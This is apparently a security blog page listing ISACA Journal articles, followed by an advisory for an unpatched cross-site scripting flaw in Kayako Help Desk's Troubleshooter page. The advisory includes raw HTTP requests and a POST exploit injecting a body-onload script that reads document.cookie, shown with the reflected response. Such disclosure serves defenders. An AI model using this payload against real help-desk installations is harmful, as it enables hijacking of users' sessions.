ISACA Journal Vol 1 2011

ISACA Journal Vol 1, 2011
Must-read articles

  • A Young Professional’s Guide to Career Success Using Soft Skills
  • Auditing Security Risks in Virtual IT Systems
  • Simplify and Layer Your Security Approach to Protect Card Data
  • JOnline: Auditing Biometrics-based Authentication Systems

Postings with regard to Apache DoS Attack New…

Postings with regard to Apache DoS Attack

Kayako Help Desk Software Cross Site Scripting Vulnerability…

Kayako Help Desk Software Cross-Site Scripting Vulnerability

Description
There is an input validation error in the Kayako, which is vulnerable to XSS.

Category lists can be created on the Troubleshooter page (by default, “General”), that is accessible to unauthenticated users.
When a user clicks a category, then the request is submitted via HTTP GET as below.

Original Request
— CUT —
GET /index.php?/Troubleshooter/Step/View/1 HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: https://example.com/index.php?/Troubleshooter/List
Accept-Language: en-us
Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: example.com
Cookie: SWIFT_client=a%3A1%3A%7Bs%3A15%3A%22templategroupid%22%3Bs%3A1%3A%221%
22%3B%7D; SWIFT_visitor=a%3A4%3A%7Bs%3A5%3A%22geoip%22%3Bi%3A1%3Bs%3A9%3A%
22notecheck%
22%3Bs%3A1%3A%221%22%3Bs%3A9%3A%22sessionid%22%3Bs%3A32%3A%22fy757s2ygz7sss
upwrzdutmhqw3voucz%22%3Bs%3A9%3A%22lastvisit%22%3Bi%3A1306828833%3B%7D; jqCookieJar_options=%7B%7D; SWIFT_sessionid40=fpsq1lzqbr8fenj8ou2t5o9qcm09bp1u; SWIFT_visitorsession=a%3A1%3A%7Bs%3A8%3A%22isbanned%22%3Bs%3A1%3A%220%22%3B%7D; SWIFT_sessionid80=fy757s2ygz7sssupwrzdutmhqw3voucz
— CUT END —

Response
— CUT —
<input type=”hidden” name=”troubleshooterstephistory” val
ue=”0″ /><input type=”hidden” name=”isback” id=”trisback” value=”0″ />
— CUT END —

The parameter “troubleshooterstephistory” lacks input validation and is vulnerable to XSS.
To exploit this, you have to send the request via HTTP POST, not HTTP GET.

Exploit
— CUT —
POST /index.php?/Troubleshooter/Step/View/1 HTTP/1.1
Content-Length: 64
Content-Type: application/x-www-form-urlencoded
Host: example.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.8.1.8) Gecko/2008101401 Firefox/3.1
Accept-Encoding: gzip,deflate
Keep-Alive: 50
Connection: Keep-Alive
Cookie: SWIFT_client=a%3A1%3A%7Bs%3A15%3A%22templategroupid%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_sessionid40=kvwgrm3nqrwjhmvfd6y4knn62sap6ohm; SWIFT_visitorsession=a%3A1%3A%7Bs%3A8%3A%22isbanned%22%3Bs%3A1%3A%220%22%3B%7D;

troubleshooterstephistory=”><body onload=alert(document.cookie)>&isback=0
— CUT END —

Response
— CUT —
<input type=”hidden” name=”troubleshooterstephistory” value=””><body onload=alert(document.cookie)>” /><input type=”hidden” name=”isback” id=”trisback” value=”0″ />
— CUT END —

Vendor Response
The vendor acknowledged the issue but no update yet.